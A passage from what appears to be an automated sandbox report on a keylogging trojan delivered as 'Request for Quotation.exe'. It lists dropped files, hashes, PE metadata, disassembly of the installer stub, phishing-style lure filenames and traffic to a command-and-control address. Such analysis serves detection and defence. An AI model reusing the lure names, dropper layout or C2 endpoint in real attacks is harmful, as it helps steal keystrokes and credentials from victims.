                                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                              Malicious:false
                                                                              Reputation:high, very likely benign file
                                                                              Preview: ..
                                                                              C:\Users\user\AppData\Local\Temp\nsc77A8.tmp\System.dll
                                                                              Process:C:\Users\user\Desktop\Request for Quotation.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):11776
                                                                              Entropy (8bit):5.855045165595541
                                                                              Encrypted:false
                                                                              SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                              MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                              SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                              SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                              SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: Metadefender, Detection: 0%
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Joe Sandbox View:
                                                                              • Filename: #U007einvoice#U007eSC00978656.xlsx, Detection: malicious
                                                                              • Filename: Purchase Order___pdf ____________.exe, Detection: malicious
                                                                              • Filename: quote.exe, Detection: malicious
                                                                              • Filename: Order83930.exe, Detection: malicious
                                                                              • Filename: Invoice 6500TH21Y5674.exe, Detection: malicious
                                                                              • Filename: Invoice 6500TH21Y5674.exe, Detection: malicious
                                                                              • Filename: GPP.exe, Detection: malicious
                                                                              • Filename: OrderSuppliesQuote0817916.exe, Detection: malicious
                                                                              • Filename: ACCOUNT DETAILS.exe, Detection: malicious
                                                                              • Filename: Quotation.com.exe, Detection: malicious
                                                                              • Filename: Unterlagen PDF.exe, Detection: malicious
                                                                              • Filename: QuotationInvoices.exe, Detection: malicious
                                                                              • Filename: PO.exe, Detection: malicious
                                                                              • Filename: SecuriteInfo.com.TrojanSpy.MSIL.Agent.22886.exe, Detection: malicious
                                                                              • Filename: SecuriteInfo.com.FileRepMalware.24882.exe, Detection: malicious
                                                                              • Filename: PDF_doc.exe, Detection: malicious
                                                                              • Filename: 09000000000000.jar, Detection: malicious
                                                                              • Filename: quotation10204168.dox.xlsx, Detection: malicious
                                                                              • Filename: notice of arrivalpdf.exe, Detection: malicious
                                                                              • Filename: R5BNZ68i0f.exe, Detection: malicious
                                                                              Reputation:moderate, very likely benign file
                                                                              C:\Users\user\AppData\Local\Temp\nsh7778.tmp
                                                                              Process:C:\Users\user\Desktop\Request for Quotation.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):167858
                                                                              Entropy (8bit):7.8527235413443
                                                                              Encrypted:false
                                                                              SSDEEP:3072:f/h6lq6XCc3XMkVOx0E/fhZA1lVN1189+pvOCrEfAWUWISphqya8DJNt:f2XCcH9Oe2TA33k+B3rgUWISpmMt
                                                                              MD5:9DACD2D5556A613412125B915ACC0A25
                                                                              SHA1:E57BA62C9D50A89174C1666F095DEB590B2D4F7B
                                                                              SHA-256:E44512128A5ED7778937E92B409D600C2889EE1C6D47582423C46DC411D2F2F2
                                                                              SHA-512:04ECBB17A1F333DD33DFCD7F1EFCA692B3787A6D8470C1BFFC70A263BA18E3E3F8437F7AA267407CE03A7004B92E8BB0555F3CB65BFACB664A5A096C70455A75
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              C:\Users\user\AppData\Local\Temp\oqhczwm.b
                                                                              Process:C:\Users\user\Desktop\Request for Quotation.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):131072
                                                                              Entropy (8bit):7.998518254143225
                                                                              Encrypted:true
                                                                              SSDEEP:3072:Pc3XMkVOx0E/fhZA1lVN1189+pvOCrEfAWUWISphqya8DI:PcH9Oe2TA33k+B3rgUWISpmx
                                                                              MD5:E5F20C3168A73483F3A1619FB349F0D2
                                                                              SHA1:92F885A7E1F271335CC4231BF0D4E4F76EA34A62
                                                                              SHA-256:347D68209F4E393B9977D0C593727388C34EEE54787A3F77E7F13E39005B616C
                                                                              SHA-512:40E42444B382D6F666A8EFAE9EF6635E8E81DD1EEBAF27F4B0DB9C5675C837EAA50AE0B7105AC75103A719563ECA7FF267E3F23DAE0D960465EFC884DECDB10F
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              C:\Users\user\AppData\Roaming\excel\logs.dat
                                                                              Process:C:\Users\user\Desktop\Request for Quotation.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):74
                                                                              Entropy (8bit):4.673971569609487
                                                                              Encrypted:false
                                                                              SSDEEP:3:ttUHS4fWT9t8rA4RXMRPHv31aeo:tmFfbXqdHv3IP
                                                                              MD5:0073BB44B36B49586AF77FC9862DC123
                                                                              SHA1:E58E4867FEE6C88C8D161AAE1250C01D4066EE95
                                                                              SHA-256:6CFC8BC39002CDFF5F6CD53EB3E783EC612D3548E37270C04A84132180C8A60C
                                                                              SHA-512:1BC4F93CB13F9C9345FEA4479490BF9DD9F0B629C86199D773F312927A909C3F4EA76B9A1CF39AFE349B456E8AFA35628351AC8D485D420E7365AFF1EA170C9B
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview: ..[2021/02/23 07:36:03 Offline Keylogger Started]....[ Program Manager ]..

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                              Entropy (8bit):7.415276485535663
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:Request for Quotation.exe
                                                                              File size:246893
                                                                              MD5:ae4bd6c5a7eaa50704d43d6054fc5dbd
                                                                              SHA1:ab597cfc0433999f2032c56fe2c9e17081bcab46
                                                                              SHA256:8e51354c8b2f461ab0cfb92409bc45bf4e06ae244080513e2d6224dc22f47771
                                                                              SHA512:b7b0b772a5e9e969f3d5389c1c12f053a5b3a7aa774fffa3a2dac8903df09a2a6b9d242a4f1fb63602d7581226ec647be44139d27aacd82dbec6242bcd3bab43
                                                                              SSDEEP:6144:M11Q0SiA9hfCmuW9e2TA3Hk+B3rUUWISpATi:ziIfCmuWE20kMUISpAO
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L..._.$_.................f...L.......4............@

                                                                              File Icon

                                                                              Icon Hash:f0f06094c36ee8c2

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x403486
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                              Time Stamp:0x5F24D75F [Sat Aug 1 02:45:51 2020 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:ea4e67a31ace1a72683a99b80cf37830

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              sub esp, 00000184h
                                                                              push ebx
                                                                              push esi
                                                                              push edi
                                                                              xor ebx, ebx
                                                                              push 00008001h
                                                                              mov dword ptr [esp+18h], ebx
                                                                              mov dword ptr [esp+10h], 0040A130h
                                                                              mov dword ptr [esp+20h], ebx
                                                                              mov byte ptr [esp+14h], 00000020h
                                                                              call dword ptr [004080B0h]
                                                                              call dword ptr [004080C0h]
                                                                              and eax, BFFFFFFFh
                                                                              cmp ax, 00000006h
                                                                              mov dword ptr [0042F44Ch], eax
                                                                              je 00007F0B98DA98F3h
                                                                              push ebx
                                                                              call 00007F0B98DACA6Eh
                                                                              cmp eax, ebx
                                                                              je 00007F0B98DA98E9h
                                                                              push 00000C00h
                                                                              call eax
                                                                              mov esi, 004082A0h
                                                                              push esi
                                                                              call 00007F0B98DAC9EAh
                                                                              push esi
                                                                              call dword ptr [004080B8h]
                                                                              lea esi, dword ptr [esi+eax+01h]
                                                                              cmp byte ptr [esi], bl
                                                                              jne 00007F0B98DA98CDh
                                                                              push 0000000Bh
                                                                              call 00007F0B98DACA42h
                                                                              push 00000009h
                                                                              call 00007F0B98DACA3Bh
                                                                              push 00000007h
                                                                              mov dword ptr [0042F444h], eax
                                                                              call 00007F0B98DACA2Fh
                                                                              cmp eax, ebx
                                                                              je 00007F0B98DA98F1h
                                                                              push 0000001Eh
                                                                              call eax
                                                                              test eax, eax
                                                                              je 00007F0B98DA98E9h
                                                                              or byte ptr [0042F44Fh], 00000040h
                                                                              push ebp
                                                                              call dword ptr [00408038h]
                                                                              push ebx
                                                                              call dword ptr [00408288h]
                                                                              mov dword ptr [0042F518h], eax
                                                                              push ebx
                                                                              lea eax, dword ptr [esp+38h]
                                                                              push 00000160h
                                                                              push eax
                                                                              push ebx
                                                                              push 00429878h
                                                                              call dword ptr [0040816Ch]
                                                                              push 0040A1ECh

                                                                              Rich Headers

                                                                              Programming Language:
                                                                              • [EXP] VC++ 6.0 SP5 build 8804

                                                                              Data Directories

                                                                              Name | Virtual Address | Virtual Size | Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8544 | 0xa0 | .rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x38000 | 0xdc50 | .rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                              IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x29c | .rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                              Sections

                                                                              Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                              .text | 0x1000 | 0x65ad | 0x6600 | False | 0.675628063725 | data | 6.48593060343 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                              .rdata | 0x8000 | 0x1380 | 0x1400 | False | 0.4634765625 | data | 5.26110074066 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data | 0xa000 | 0x25558 | 0x600 | False | 0.470052083333 | data | 4.21916068772 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                              .ndata | 0x30000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .rsrc | 0x38000 | 0xdc50 | 0xde00 | False | 0.0953160191441 | data | 3.75209988336 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              Name | RVA | Size | Type | Language | Country
                                                                              RT_ICON | 0x381d8 | 0xd228 | data | |
                                                                              RT_DIALOG | 0x45400 | 0x100 | data | English | United States
                                                                              RT_DIALOG | 0x45500 | 0x11c | data | English | United States
                                                                              RT_DIALOG | 0x4561c | 0x60 | data | English | United States
                                                                              RT_GROUP_ICON | 0x4567c | 0x14 | data | |
                                                                              RT_VERSION | 0x45690 | 0x280 | data | English | United States
                                                                              RT_MANIFEST | 0x45910 | 0x340 | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                                                              Imports

                                                                              DLL | Import
                                                                              ADVAPI32.dll | RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                                              SHELL32.dll | SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                                              ole32.dll | IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                                              COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                              USER32.dll | SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                                              GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                              KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, GetTempFileNameA, RemoveDirectoryA, WriteFile, CreateDirectoryA, GetLastError, CreateProcessA, GlobalLock, GlobalUnlock, CreateThread, lstrcpynA, SetErrorMode, GetDiskFreeSpaceA, lstrlenA, GetCommandLineA, GetVersion, GetWindowsDirectoryA, SetEnvironmentVariableA, GetTempPathA, CopyFileA, GetCurrentProcess, ExitProcess, GetModuleFileNameA, GetFileSize, ReadFile, GetTickCount, Sleep, CreateFileA, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                                                              Version Infos

                                                                              Description | Data
                                                                              LegalCopyright | Copyright adroit
                                                                              FileVersion | 83.34.3.56
                                                                              CompanyName | ironing
                                                                              LegalTrademarks | Dagoman
                                                                              Comments | diamond in the rough
                                                                              ProductName | sarita devi
                                                                              FileDescription | mons pubis
                                                                              Translation | 0x0409 0x04e4

                                                                              Possible Origin

                                                                              Language of compilation system | Country where language is spoken | Map
                                                                              English | United States |

                                                                              Network Behavior

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                              Feb 23, 2021 07:36:06.520314932 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520358086 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520363092 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.520395994 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520405054 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.520433903 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520473957 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520487070 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.520514011 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520553112 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520579100 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.520589113 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520632982 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.520637035 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520678997 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520715952 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520726919 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.520755053 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520792007 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520802975 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.520828009 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520869017 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520874977 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.520905972 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520953894 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520961046 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.520996094 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.521034002 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.521044016 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.521074057 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.521131039 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763292074 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763318062 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763334990 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763353109 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763369083 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763390064 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763407946 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763416052 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763425112 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763442993 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763457060 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763459921 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763477087 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763480902 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763499975 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763503075 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763516903 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763533115 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763535976 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763550043 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763566971 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763587952 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763592005 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763607025 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763617039 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763624907 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763641119 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763658047 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763674021 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763674021 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763690948 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763690948 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763708115 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763709068 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763729095 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763748884 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763751984 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763766050 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763782024 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763789892 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763799906 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763817072 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763818979 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763834953 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763851881 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763860941 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763871908 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763890982 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763892889 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763906956 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763923883 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763941050 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763947010 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763957024 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763973951 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763976097 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763989925 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763995886 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.764010906 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.764024973 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.764029026 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.764045954 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.764061928 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.764079094 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.764080048 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.764095068 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.764110088 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.764111996 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.764128923 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.764138937 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.764173985 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.999809027 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.999871016 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.999888897 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.999903917 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.999919891 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.999936104 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.999947071 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.999952078 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.999968052 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.999969006 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.999979973 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.999984026 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000004053 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000020981 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000020981 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000036955 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000052929 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000055075 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000067949 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000085115 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000086069 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000101089 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000108957 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000117064 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000135899 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000140905 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000154018 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000169992 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000173092 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000185966 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000201941 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000216007 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000221014 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000232935 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000247955 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000255108 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000267029 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000279903 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000283957 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000299931 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000303984 CET497284299192.168.2.4103.89.88.238
